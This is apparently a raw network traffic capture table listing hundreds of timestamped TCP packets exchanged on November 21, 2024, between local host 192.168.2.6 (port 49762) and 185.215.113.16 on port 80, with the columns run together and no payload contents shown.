                                                                                                                                                                      Nov 21, 2024 06:23:41.068711996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.068756104 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.068831921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.069327116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.069379091 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.069415092 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.070008039 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.070064068 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.070099115 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.070698977 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.070740938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.070769072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.071393967 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.071440935 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.071492910 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.072103024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.072189093 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.072192907 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.072771072 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.072824955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.072846889 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.073461056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.073498011 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.073534966 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.074147940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.074201107 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.074256897 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.074908018 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.075004101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.075051069 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.075537920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.075767994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.075825930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.076212883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.076261044 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.076324940 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.076901913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.076962948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.077084064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.077578068 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.077688932 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.077702999 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.078300953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.078361988 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.078480959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.078957081 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.079061985 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.079083920 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.079663038 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.079705000 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.079756975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.080341101 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.080431938 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.080432892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.081015110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.081058025 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.081118107 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.081718922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.081764936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.081824064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.082400084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.082449913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.082494974 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.083076000 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.083148956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.083206892 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.083776951 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.083861113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.083869934 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.084671021 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.084736109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.084774017 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.085148096 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.085195065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.085264921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.131441116 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.131454945 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.131468058 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.131503105 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.131553888 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.132678986 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.132721901 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.132734060 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.132781982 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.133799076 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.133846045 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.133857965 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.133862972 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.133892059 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.135339975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.135351896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.135363102 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.135391951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.136030912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.136077881 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.136089087 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.136091948 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.136135101 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.137588024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.137646914 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.137660027 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.137701035 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.138595104 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.138643026 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.138730049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.138741970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.138784885 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.139924049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.139936924 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.139947891 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.139975071 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.140695095 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.140734911 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.140746117 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.140779018 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.140815973 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.142235994 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.142258883 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.142271042 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.142316103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.142762899 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.142777920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.142790079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.142821074 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.142855883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.144486904 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.144526005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.144537926 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.144584894 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.144979954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.145030022 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.145036936 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.145042896 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.145082951 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.146385908 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.146415949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.146426916 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.146498919 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.146856070 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.146918058 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.147672892 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.147701025 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.147712946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.147764921 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.148246050 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.148272991 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.148284912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.148303986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.148345947 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.149650097 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.149678946 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.149691105 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.149732113 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.150995016 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.151045084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.151046991 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.151058912 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.151113033 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.151871920 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.151916981 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.151927948 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.151977062 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.152488947 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.152527094 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.152539968 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.152544022 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.153445959 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.153898954 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.153942108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.153960943 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.154004097 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.155056953 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.155107975 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.155123949 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.155131102 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.155174971 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.155930996 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.155972004 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.155982971 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.156028986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.157269001 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.157314062 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.157325983 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.157370090 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.157845974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.157891035 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.157902002 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.157941103 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.159226894 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.159281969 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.159286976 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.159292936 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.159337997 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.159919024 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.159974098 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.159985065 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.160031080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.161302090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.161345959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.161355019 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.161358118 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.161400080 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.162064075 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.162098885 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.162110090 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.162138939 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.163456917 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.163510084 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.163511038 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.163522959 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.163561106 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.164119005 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.164195061 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.164206028 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.164242983 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.164928913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.164978981 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.165544987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.165585995 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.165599108 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.165640116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.166801929 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.166853905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.166866064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.166877985 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.166913986 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.167509079 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.167557955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.167568922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.167609930 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.168875933 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.168895960 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.168908119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.168937922 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.168979883 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.169599056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.169627905 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.169640064 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.169680119 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.170916080 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.170963049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.170972109 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.170974970 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.171024084 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.171704054 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.171736956 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.171747923 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.171792984 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.173007011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.173058987 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.173075914 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.173080921 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.173124075 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.173676014 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.173726082 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.173742056 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.173785925 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.175106049 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.175151110 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.175163031 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.175173998 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.175204992 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.175810099 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.175825119 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.175837040 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.175879002 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.177201033 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.177239895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.177246094 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.177253962 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.177301884 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.177789927 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.177834034 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.177845955 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.178105116 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.179368973 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.179404974 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.179416895 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.179429054 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.179461002 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.179868937 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.179913044 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.179924011 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.179969072 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.180805922 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.180831909 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.180844069 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.180880070 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.180947065 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.181710958 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.181747913 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.181760073 CET8049762185.215.113.16192.168.2.6
                                                                                                                                                                      Nov 21, 2024 06:23:41.181889057 CET4976280192.168.2.6185.215.113.16
                                                                                                                                                                      Nov 21, 2024 06:23:41.182665110 CET8049762185.215.113.16192.168.2.6
